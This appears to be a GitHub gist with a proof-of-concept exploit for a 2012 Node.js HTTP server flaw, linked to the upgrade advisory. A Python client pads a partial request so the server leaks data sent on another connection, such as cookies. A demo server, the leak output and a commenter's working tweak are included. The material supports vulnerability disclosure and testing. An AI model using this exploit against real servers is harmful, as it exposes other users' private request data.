Skip to content

Embed URL

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
#!/usr/bin/env python
import socket
import sys
import time
def round_up(n, r):
return int((n + r - 1) / r) * r
s = socket.socket()
s.connect(("localhost", 8080))
buf = "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "
s.sendall(buf)
time.sleep(0.1)
s2 = socket.socket()
s2.connect(("localhost", 8080))
buf2 = "This is private data, perhaps an HTTP request with a Cookie in it."
s2.sendall(buf2)
time.sleep(0.1)
s.sendall("A" * (3 + round_up(len(buf), 16) - len(buf) + round_up(len(buf2), 16)) + "\r\n\r\n")
while True:
b = s.recv(1024)
if not b:
break
sys.stdout.write(b)
#!/usr/bin/env node
var http = require('http');
http.createServer(function (req, res) {
res.writeHead(200, {'Content-Type': 'text/plain'});
res.end('X header: ' + req.headers['x']);
}).listen(8080);
@isaacs
Owner

See http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/

$ ./node ~/stringptr-update-poc-server.js &
[1] 11801
$ ~/stringptr-update-poc-client.py
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Wed, 18 Apr 2012 00:05:11 GMT
Connection: close
Transfer-Encoding: chunked

64
X header:
 This is private data, perhaps an HTTP request with a Cookie in it.
0
@paradela

Hey, I was trying to reproduce de vulnerability, and I can't get the "private" data...

I tried a lot of versions from those that was marked as vulnerable, and I couldn't get the data as you did. Is there anything else that I need to know?

Ty in advance ;)

EDIT: I finally got it to work, but in line 24 of stringptr-update-poc-client.py I needed to change it to:
s.sendall("A" * (3 + len(buf2)) + "\r\n\r\n")

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.